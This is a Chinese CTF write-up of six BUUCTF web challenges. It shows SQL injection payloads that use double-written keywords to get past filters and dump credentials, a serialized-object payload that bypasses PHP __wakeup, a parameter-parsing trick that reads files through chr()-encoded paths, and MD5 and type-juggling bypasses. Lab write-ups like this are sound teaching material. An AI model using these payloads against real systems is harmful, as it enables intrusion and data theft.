首页 > 其他分享 >BUUCTF-WEB(15-20)

BUUCTF-WEB(15-20)

时间:2024-05-19 21:29:59浏览次数:11  
标签:__ WEB BUUCTF 15 22% chr 2019 绕过 序列化

[极客大挑战 2019]BabySQL

打开题目就试了试万能密码,是不行的

image-20240519150211630

推测应该做了过滤

我们密码框输入1' 1 or '1'='1试试

image-20240519151557536

发现我们的or没了,union,select,where都被过滤了,应该是被替换成空字符,所以我们可以双写绕过

uunionnion sselectelect wwherehere

由于这里or被过滤了,我们无法用order用判断字段数,只能union select(以下注入都在密码框进行)

1' uunionnion sselectelect 1,2,3#

image-20240519152102655

爆库名:

1' uunionnion sselectelect 1,2,database()#

image-20240519152209383

爆表名:

1' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'#

image-20240519152640220

爆列名:

1' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_schema='geek'aandnd table_name='b4bsql'#

image-20240519152759357

爆数据:

1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql#

image-20240519153318822

[极客大挑战 2019]PHP

打开题目告诉我们网站备份了

然后我们应该dirsearch扫后台,这里可能是因为平台的原因,扫不出来的

备份文件就是 www.zip

我们访问下载,index.php发现了参数select

image-20240519160241899

然后在class.php这里看怎么去反序列化

image-20240519160323742

我们构造就是

new Name::__construct()->new Name::__destruct()

所以我们需要绕过__wakeup()

CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧_ctf php 反序列化漏洞-CSDN博客

攻击者可以利用这个漏洞来绕过 __wakeup() 函数中的安全检查,从而执行任意代码。攻击者可以使用 O 类型的序列化字符串来创建一个新的对象,并在其中添加任意数量的属性。然后,攻击者可以修改序列化字符串中属性的数量,使其比实际属性数量多。由于 PHP 会忽略多余的属性,攻击者可以绕过 __wakeup() 函数的安全检查,并执行恶意代码。

然后我们打开php在线(此处打印两个变量,为了方便比较数量对应的哪个数值)

image-20240519161217020

构造链子后因为我们需要绕过__wakeup(),所以我们需要改一下这个数量

给我标记的地方改成三,然后复制URL编码后的序列化的数据。

image-20240519161316419

payload:

?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

image-20240519161453754

[ACTF2020 新生赛]BackupFile

就是备份文件,dirsearch扫描

image-20240519163203428

发现了index.php.bak,下载

image-20240519163707013

在PHP中:= = 为弱相等,即当整数和字符串类型相比较时。会先将字符串转化为整数然后再进行比较

所以我们payload:

?key=123

image-20240519164914400

[RoarCTF 2019]Easy Calc

参考:

RoarCTF 2019 - Easy Calc - ch0bits - 博客园 (cnblogs.com)

RoarCTF 2019]Easy Calc 详细题解笔记 Writeup_scandir被过滤-CSDN博客

PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_参数解析 绕过-CSDN博客

在源码里面找到了一个文件

image-20240519201624194

我们访问一下

image-20240519201929861

这里我也不会了就搜了一下题解

查看根目录

?%20num=print_r(scandir(chr(47)));

image-20240519203614757

查看flag

?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

image-20240519203952246

[极客大挑战 2019]BuyFlag

来到买flag的地方,看一下源码

image-20240519204806236

我们需要post传参,我burp抓包看一眼

image-20240519205326964

条件就是我需要是cuit的学生,然后才能买,这里我注意到user=0,我们改成1试试,成功了

image-20240519205415709

那我们就差个money还有password

password就用字符串绕过

POST的内容如下:

password=404a&money=1000000000

image-20240519205704886

他说钱长度太多了,那我们就科学计数法

password=404a&money=1e9

image-20240519205756660

[BJDCTF2020]Easy MD5

参考:

[BJDCTF2020]Easy MD5(详细)-CSDN博客

总结ctf中 MD5 绕过的一些思路_ctf md5-CSDN博客

这里打开题目,就个输入框,啥也没有

我这里也挺傻逼,我抓包也没看到hint,看wp才看到

image-20240519211931880

然后意思就是后面需要真值,然后才行

答案就是需要传

ffifdyop

然后跳到新界面,然后查看源码,md5弱比较

image-20240519212054698

直接传

a=QNKCDZO&b=240610708

又跳了一个界面,代码如下:

image-20240519212242545

这次是===是强比较,类型,数值都得比较,那我们就数组绕过

param1[]=1&param2[]=2

image-20240519212414869

image-20240519212436496

标签:__,WEB,BUUCTF,15,22%,chr,2019,绕过,序列化
From: https://www.cnblogs.com/Muneyoshi/p/18200792

相关文章

  • 嵌入式Linux中的LED驱动控制(以野火STM32MP157开发板为例)
    在嵌入式Linux系统中,由于从硬件到软件都是自己定制的,所以很多时候需要对自己定义的设备编写驱动程序。本例就以野火STM32MP157开发板为例,讨论如何控制开发板上三个LED的亮灭。先来看一下LED部分的电路原理图,如下所示。从上图中可以看到,三个RGB颜色的二极管采用共阳接法,因此在......
  • 基于webapi的websocket聊天室(四)
    上一篇实现了多聊天室。这一片要继续改进的是实现收发文件,以及图片显示。效果问题websocket本身就是二进制传输。文件刚好也是二进制存储的。文件本身的传输问题不太,但是需要传输文件元数据,比如文件名和扩展名之类的。这很必要,如果我们想知道怎么展示这个文件的话。比如这个......
  • BUUctf xor
    0x01关于xorxor,即为计算机中的异或计算,相同为0,不同为1。下面是关于异或加密的四个定理A^0=AA^A=0(A^B)^C=A^(B^C)(B^A)^A=B^0=B//明文B;密码A观察可知,经历异或加密后的密文,再次进行异或算法即可得到明文。0x02题解先丢进Die看一眼......
  • [Ynoi2015] 纵使日薄西山
    按照题目来模拟,假设\(a_x\)为最大的,那么任意时刻不可能选中\(a_{x-1}\)或者\(a_{x+1}\)来操作的然后就可以发现,我们选出的数一定是不相邻的,也就是说,我们每次在还可以选择的数中找出最大的数(满足此条件下下标最小),并且把相邻的两个数标记为不可选择,一直重复这个过程直到为\(0\);显然......
  • 【0day漏洞复现】北京慧飒科技有限责任公司WEB VIDEO PLATFORM存在未授权访问漏洞
    阅读须知花果山的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。......
  • Visual Studio 2015 编写 CUDA 关键字高亮并自动补全_cuda vs 波浪线
    CSDN搬家失败,手动导出markdown后再导入博客园第一步,是在vs2015里面设置vc++文件支持.cu;cuh;文件。方法:工具->选项->文本编辑器->文件扩展名。得到如图所示的界面:注意,在右侧可以添加vc++类型的文件扩展名,这是我的设置效果,操作就不用细说了。![[output/attachme......
  • Obsidian 使用 ddnsto 穿透 nas 的 webdav 功能实现跨平台同步_obsidian nas 同步
    CSDN搬家失败,手动导出markdown后再导入博客园之前一直用坚果云的webdav功能做obsidian的跨平台同步(Windows,Ubuntu,iOS),但是今天在新的工作机上部署obsidian时,发现一次同步的文件数量超过了坚果云的限制(付费用户好像是500次),因此想换个平台来考虑。备选方案一个是阿里云的......
  • 使用eclipse建立webservice服务和客户端new
    使用eclipse建立webservice服务和客户端 平时在练习使用webservice互相传数据时,可以使用eclipse建立一个服务端发布WSDL,当然自身也可以建立客户端。Webservice是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标......
  • 利用Burpsuite爆破带有验证码web登录接口
    工具下载地址https://github.com/f0ng/captcha-killer-modified该工具下的验证码识别python脚本要求python环境小于3.10.0安装验证码识别python脚本引用的库pipinstall-ihttp://mirrors.aliyun.com/pypi/simple/--trusted-hostmirrors.aliyun.comddddocraiohttp加载工......
  • .Net6 web API (Log日志)
    前言需要给项目打上日志可以查询哪里的信息 下面是步骤注意:不能允许没有任何监控的系统上线如何监控---日志记录需要日志信息的持久化-保存到文件中,保存到数据库中;11.11og4net日志记录1、Nuget引l入程序包Log4net+Microsoft.Extensions.Logging.Log4Net.AspNetcore2、......